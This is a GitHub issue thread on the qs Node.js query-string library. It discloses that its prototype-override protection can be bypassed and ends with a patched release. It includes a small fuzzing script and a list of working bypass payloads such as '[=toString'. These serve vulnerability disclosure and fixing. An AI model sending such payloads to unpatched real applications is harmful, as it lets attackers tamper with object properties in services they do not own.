Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

prototype override protection bypass problem still exists. #200

Closed
myvyang opened this issue Mar 2, 2017 · 6 comments · Fixed by #201
Closed

prototype override protection bypass problem still exists. #200

myvyang opened this issue Mar 2, 2017 · 6 comments · Fixed by #201
Labels
bug parse security

Comments

@myvyang
Copy link

myvyang commented Mar 2, 2017

as the bug https://snyk.io/vuln/npm:qs:20170213 report fixed, but the other bypass

a = qs.parse("[=toString", {allowPrototypes: false})
// { toString: true }

still exists.
@fengmk2
Copy link

fengmk2 commented Mar 2, 2017
edited

Yep, it's only fixed ]=toString, but [=toString not fix.

image

@myvyang
Copy link
Author

myvyang commented Mar 2, 2017
edited

i also write a simple tool to find this kind of bug. maybe it's also useful for other querystring implemention.

var qs = require("qs");

var meta = ['\\', '"', '\'', '[', ']', '.', 'toString', '='];
var length = meta.length;

var s = [];

var gen = function(n) {

    if (n == 0) {
        var query = s.join('');
        var o = qs.parse(query);
        if (!(typeof o.toString === 'function')) {
            console.log(query);
        }
    } else {
        for(var i = 0; i < length; i++) {
            s.push(meta[i]);
            gen(n-1);
            s.pop();
        }
    }
}

for(var i = 0; i < 6; i++)
    gen(i);

string which will bypass the protection (maybe caused by the same problem):

[=toString
[\=toString
["=toString
['=toString
[[=toString
[.=toString
[toString=toString
[\\=toString
[\"=toString
[\'=toString
[\[=toString
[\.=toString
[\toString=toString
["\=toString
[""=toString
["'=toString
["[=toString
[".=toString
["toString=toString
['\=toString
['"=toString
[''=toString
['[=toString
['.=toString
['toString=toString
[[\=toString
[["=toString
[['=toString
[[[=toString
[[.=toString
[[toString=toString
[.\=toString
[."=toString
[.'=toString
[.[=toString
[..=toString
[.toString=toString
[toString\=toString
[toString"=toString
[toString'=toString
[toString[=toString
[toString.=toString
[toStringtoString=toString

@gxcsoccer
Copy link

😭

@dead-horse dead-horse mentioned this issue Mar 2, 2017
Merged
@dead-horse
Copy link
Contributor

@kamael please check this #201

@ljharb
Copy link
Owner

ljharb commented Mar 2, 2017

Thank you, I'll take a look at this.

In the future, please use responsible reporting practices to submit security issues, which means not posting them publicly until a fix has been released.

ljharb pushed a commit to dead-horse/qs that referenced this issue Mar 6, 2017
@dead-horse @ljharb
[Fix] follow allowPrototypes option during merge
ec9e736 
Fixes ljharb#200.
ljharb pushed a commit to dead-horse/qs that referenced this issue Mar 6, 2017
@dead-horse @ljharb
[Fix] support keys starting with brackets.
12152db 
Relates to ljharb#200.
@ljharb
Copy link
Owner

ljharb commented Mar 6, 2017

Released in v6.4.0, v6.3.2, v6.2.3, v6.1.2, v6.0.4.

ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] follow allowPrototypes option during merge
760d0a1 
Fixes #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] support keys starting with brackets.
1c045ca 
Relates to #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] follow allowPrototypes option during merge
8e2af08 
Fixes #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] support keys starting with brackets.
8e1f3e7 
Relates to #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] follow allowPrototypes option during merge
62153c2 
Fixes #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] support keys starting with brackets.
efd5f33 
Relates to #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] follow allowPrototypes option during merge
4d8ed03 
Fixes #200.
ljharb pushed a commit that referenced this issue Mar 7, 2017
@dead-horse @ljharb
[Fix] support keys starting with brackets.
c709f6e 
Relates to #200.
This was referenced Apr 5, 2017
Closed
Closed
@myvyang myvyang mentioned this issue Apr 7, 2017
Closed
@ljharb ljharb added the parse label Jun 15, 2017
robocop bot referenced this issue in goeltanmay/PatientsApp Nov 14, 2017
@jitinnagpal1989
Update README.md
0ec6558
robocop bot referenced this issue in goeltanmay/PatientsApp Nov 14, 2017
@jitinnagpal1989
Update README.md
40b5550
robocop bot referenced this issue in goeltanmay/PatientsApp Nov 14, 2017
@jitinnagpal1989
Update README.md
4854c9d
robocop bot referenced this issue in goeltanmay/PatientsApp Nov 14, 2017
@jitinnagpal1989
Update README.md
45c7393
robocop bot referenced this issue in goeltanmay/PatientsApp Nov 14, 2017
@jitinnagpal1989
Update README.md
a3fc32a
robocop bot referenced this issue in goeltanmay/PatientsApp Nov 14, 2017
@jitinnagpal1989
Update README.md
9165157
@ulziibay ulziibay mentioned this issue Oct 2, 2020
Merged
This was referenced Mar 11, 2021
Closed
Open
Closed
Closed
@dependabot dependabot bot mentioned this issue Mar 18, 2021
Open
@awshole awshole mentioned this issue Sep 10, 2021
Open
@CxFerris CxFerris mentioned this issue Apr 26, 2022
Open
@CxElks CxElks mentioned this issue Apr 26, 2022
Open
@gvocstr gvocstr mentioned this issue May 9, 2022
Open
@pedromprdias2 pedromprdias2 mentioned this issue May 9, 2022
Open
@danielgerb danielgerb mentioned this issue May 9, 2022
Open
This was referenced May 11, 2022
Closed
Closed
@cx-rotemd cx-rotemd mentioned this issue May 16, 2022
Open
This was referenced May 6, 2022
Open
Open
Open
@jbrotsos jbrotsos mentioned this issue Jun 16, 2022
Open
@github-actions github-actions bot mentioned this issue Aug 1, 2022
Open
@amitshalemCx amitshalemCx mentioned this issue Aug 10, 2022
Open
@cx-tatianab cx-tatianab mentioned this issue Feb 7, 2023
Open
@dorohayon dorohayon mentioned this issue Feb 7, 2023
Open
@Yoavast Yoavast mentioned this issue Feb 27, 2023
Open
This was referenced Mar 7, 2023
Open
Open
Open
@diogopcx diogopcx mentioned this issue Jun 27, 2023
Open
@apcxtest apcxtest mentioned this issue Aug 17, 2023
Closed
@cyates-checkmarx cyates-checkmarx mentioned this issue Jun 23, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug parse security
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix: follow allowPrototypes during merge dead-horse/qs
5 participants
@ljharb @fengmk2 @dead-horse @gxcsoccer @myvyang